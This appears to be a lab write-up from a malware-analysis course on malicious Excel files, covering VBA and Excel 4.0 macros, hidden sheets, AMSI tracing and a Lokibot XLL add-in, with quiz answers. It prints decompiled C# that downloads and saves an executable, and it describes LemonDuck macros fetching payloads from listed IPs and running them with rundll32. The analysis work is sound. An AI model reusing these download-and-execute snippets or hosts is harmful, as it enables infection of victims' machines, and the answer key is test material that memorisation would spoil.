Excel Macro Analysis

Adversaries often exploit Excel 4.0 macros to execute malicious actions upon opening a document. This section analyzes a malicious Office file, detailing attacker techniques and defense strategies. Excel's macro capabilities, including VBA and API calls, are commonly abused to obfuscate code, download payloads, and execute system commands.

VBA vs XLM Macros

In the previous sections, we have already seen the abuse of macros to gain code execution on the target system. Interestingly, those macros are VBA-based. Hence, when we extract the contents of, say, a Word file, we will see a dedicated directory for the VBA macro project used inside the document. Excel is an exception when it comes to macros.

Excel has mainly two types of macros:

  • Excel 5.0 Macros

  • Excel 4.0 Macros

Users can choose between two macro standards: the modern Excel 5.0 VBA-based macros and the legacy Excel 4.0 XLM macros. XLM macros, stored in OLE streams, are often favored by attackers to bypass security measures. Excel, part of Microsoft 365, supports powerful automation through VBA, which can be abused to obfuscate code, invoke Windows APIs, download malicious payloads, and execute system programs.

Excel 5.0 Macros (VBA)

Excel VBA Macros, similar to those in Word, are embedded using Visual Basic for Applications. They can be accessed via Alt+F11 or View > Macro > View Macros, opening the VBA editor with visible macro code, as shown in the screenshot.

To get the details of the VBA macro code, we can use olevba.py.

python c:\tools\maldoc\office\tools\oletools\olevba.py c:\Tools\Maldoc\Office\Demo\Samples\Excel\Demo\VBA\update-kb.xlsm

Excel 4.0 Macros (XLM)

These files show no macros when opened with Alt+F11, the shortcut for accessing VBA in Excel.

So the question is how is the malicious code inserted in these files?

The answer is Excel 4.0 Macro.

When attackers create an excel file, they insert an MS Excel 4.0 macro sheet in the workbook.

These sheets are often hidden in this kind of files.

Formulas are often in white text color on a white background. This makes them hidden from the eyes of the end user or analyst. However, they are still visible programmatically, such as by using tools like olevba, etc.

Internal Structure of Excel Files

Excel files, particularly those saved in the .xls or .xlsx format, are complex structures composed of various components:

  • Worksheets: Main data containers arranged in a grid of cells holding text, numbers, or formulas.

  • Workbook: The overarching file structure containing one or more worksheets and other components.

  • Macros: Embedded VBA or Excel 4.0 scripts used for automation; can pose security risks.

  • Cells: Basic data units within worksheets, capable of storing text, numbers, or formulas.

  • OLE Objects: Embedded content like images or documents using Object Linking and Embedding (OLE).

Modern Excel (.xlsx) files use an XML-based structure, with key data stored in workbook.xml, which defines the workbook layout and includes <sheet> tags listing all sheets. Analyzing these tags helps identify hidden sheets—often used by attackers to conceal malicious Excel 4.0 macros—by checking attributes like state="hidden".

Let's start with getting some basic information about the file type we are dealing with using trid:

trid C:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\Urgent-patch-ALL.xls

Next, we can run strings on the file:

strings C:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\Urgent-patch-ALL.xls | findstr /I "http url exe dll"

Sometimes, search using strings can also provide some useful information. For example, the PowerShell related command in the above output can be revealed.

Let's check some basic information using the OLEID.

python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls

As shown in the output from OLEID, the file contains XLM macros and suggests using olevba to analyse them.

python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls

OLEDUMP includes several plugins, notably plugin_biff, which is used to analyze the older Excel 97–2003 BIFF format and detect potential Excel 4.0 macro usage.

python C:\Tools\MalDoc\Office\Tools\oletools\oledump\oledump.py c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls -p plugin_biff 

This plugins parses BIFF format in .xls files (e.g., Excel 4 macros) and provides lot of information. We need to filter the required information related to Excel 4 macros. The -x option will select all records relevant for Excel 4 macros:

This shows us all records relevant to Excel 4.0 macros. We can also see the records that contains suspicious commands.

Hidden sheets

Workbook sheets may be hidden or "very hidden," but can be detected using plugin_biff, YARA signatures, or revealed directly in Microsoft Office.

From the UI of MS Excel, we can see the hidden sheet by doing a "Right click" on the sheets and selecting "Unhide".

Select the hidden sheet, and click ok to unhide it.

This is how the hidden sheet looks like - completely blank.

Select all and change font color to something dark.

This technique is often used by adversaries to hide formulas from the analyst's eyes. We will now use XLMMacroDeobfuscator to extract the XLM or Excel 4.0 macros.

XLMDeobfuscator --file c:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\urgent-patch-all.xls

AMSI Monitoring

AMSI can help analyze malware behavior without manual deobfuscation, though it requires execution. The AMSIScriptContentRetrieval PowerShell script leverages the AMSI ETW provider to extract script content, which we will demonstrate.

First, we need to start an ETW trace for the provider Microsoft-Antimalware-Scan-Interface:

logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

Execute the malicious macro or scripts after starting the trace, and they will be logged by AMSI. Then stop the trace by using below command:

logman stop AMSITrace -ets

Then, we'll run the script to extract the deobfuscated content from AMSI:

C:\Tools\MalDoc\Office\Demo\Samples\Excel\Demo\AMSIScriptContentRetrieval.ps1

Questions

Q1) Perform analysis of Excel VBA macro file "update-kb.xlsm" located at "C:\Tools\Maldoc\Office\Demo\Samples\Excel\Demo\VBA". The macro code runs the downloaded executable using a PowerShell cmdlet. Type the name of the PowerShell cmdlet as your answer. Answer format is *****-******s

 python c:\tools\maldoc\office\tools\oletools\olevba.py C:\Tools\Maldoc\Office\Demo\Samples\Excel\Demo\VBA\update-kb.xlsm

Answer: Start-Process

Obfuscated Excel 4.0 Macro (XLM)

We'll start with getting some basic information about the file we are dealing with using trid:

trid C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

Next, we'll check some more information related to this file using OleId, which shows that there are XLM macros present in this file.

python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

OleId suggests that this file contains XLM macros. We'll use olevba to analyze them.

python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

Olevba shows the details of the raw EXCEL4/XLM macro formulas. It also shows the deobfuscated EXCEL4/XLM macro formulas at the bottom.

We can see the suspicious URLs that host the malicious files.

Zipdump gives us a glimpse of what's inside the Excel file.

python C:\Tools\MalDoc\Office\Tools\DidierStevensSuite\zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm

We start our manual analysis by extracting the Excel file with the 7zip utility. The output below shows the contents of the sample Excel file.

There is one directory named "xl". The image below shows the contents in the "xl" directory.

The workbook.xml file contains essential details about the Excel project, useful for identifying hidden, potentially malicious sheets and macros during analysis.

sharedStrings.xml is another very important file we need to check to uncover all strings used in the project. The Excel project uses indices in this document to reference the strings.

Finally, the directory macrosheets contains our malicious macros.

Automating the XLM Deobfuscation

The tool XLMMacroDeobfuscator can automate the manual process of XLM deobfuscation. This tool emulates macro code execution to produce deobfuscated macro code.

xlmdeobfuscator --file "C:\Tools\MalDoc\Office\Demo\Samples\Excel\LemonDuck\Document_1997713103_03232021_Copy.xlsm"

When the user opens the document, macro in the sheet1 is invoked. This will download three payloads - doka,doka1, and doka2 from 188.127.227.99, 45.150.67.29 and 195.123.213.126, respectively, by invoking URLDownloadToFileA from urlmon.dll.

Then the macro in the sheet2 is executed. The macro in the sheet2 simply uses the =EXEC() function to run rundll32. The rundll32 is used to invoke the function DllRegisterServer exported by doka, doka1, and doka2.

Excel-DNA C# XLL Add-ins (Lokibot)

Malware groups are increasingly using malicious Excel Add-in (XLL) files—DLL-like components that extend Excel via API calls—as a powerful alternative to VBA for executing malicious code.

Most files like this are made using C or C++ and run directly in Excel. But developers can also make them using C#. This mixes the speed of Excel files with the ease of C#. To do this, they use Excel DNA—a free tool that helps create powerful Excel add-ins with C#. These add-ins can add new features, automate tasks, and more.

How Excel DNA Works?

Excel DNA works by wrapping .NET code into a native XLL wrapper that Excel can load. The core components of an Excel DNA Add-In include:

  • ExcelDna.Integration: This is the primary library that enables integration with Excel. It provides attributes and classes for creating custom Excel functions, macros, and ribbon extensions.

  • ExcelDna.AddIn: This defines the entry point of the XLL Add-In and contains the logic for loading and managing the Add-In's functionality.

  • .dna File: This XML-based file defines the Add-In's configuration, specifying which .NET assemblies to load, any additional references, and the Add-In’s main class.

This .dna XML file is very important as it will help us identify which DLL file to analyze.

The first thing we can look for is the type DNA in the resources upon opening this sample in PE-Bear.

We'll use an open-source project called ExcelDna-Unpack, which is a command-line utility to extract the contents of Excel-DNA add-ins.

C:\Tools\exceldna-unpack\exceldna-unpack.exe --xllFile="MV SEAMELODY.xll"

Let's open the DNA file in Notepad++ or another text editor.

The .dna file defines the configuration of the Excel-DNA add-in in XML format, including an ExternalLibrary element that embeds a library within the package under the identifier EXCEL NEW.

Now we need to analyze this file the EXCEL NEW, which is present in the unpacked directory. To verify the file type, we can use trid or another tool called Detect It Easy, which can help determine types of files.

trid "unpacked\EXCEL NEW.dll"

Since these XLL add-ins use a .NET DLL (as indicated by the .dna configuration file), dnSpy is an excellent tool for analyzing them.

Let's drag and drop the DLL file EXCEL NEW.dll (which is referenced in the .dna file) from the unpacked directory into dnSpy.

Once the DLL is loaded, dnSpy decompiles it into readable C# and displays its structure. You can explore methods and classes—especially public ones exposed via the XLL add-in—to identify suspicious behavior like external calls or file access.

The code is within the excel_new.ExcelDNANS namespace, and the primary class of interest is ExcelDNAInt, which implements the IExcelAddIn interface from ExcelDna.

Inside it, there is an Auto_Open method, which is an event handler that executes when the Excel add-in is loaded (similar to an Auto_Open macro in VBA). This method is where the malicious activity takes place.

The line below configures the .NET framework to use TLS 1.2 when making network connections, ensuring that the download occurs over a secure connection.

ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;

The code uses WebClient to download an executable file from a specified URL (hxxp[:]103[.]89[.]90[.]10/intelpro/goa[.]exe).

byte[] bytes = new WebClient().DownloadData("http[:]103[.]89[.]90[.]10/intelpro/goa[.]exe");

The downloaded file is saved to the user's Temp directory as sse.exe.

File.WriteAllBytes(Environment.GetEnvironmentVariable("Temp") + "\\sse.exe", bytes);

Questions

Q1) Open the XLL sample "C:\Tools\MalDoc\Office\Demo\Samples\xll\lokibot\MV SEAMELODY.xll" in the PE-Bear. Go to the Exports tab and figure out the name of the Exported function that ends with Open. Type the function name as your answer. Answer Format is ******Open

Answer: xlAutoOpen

Last updated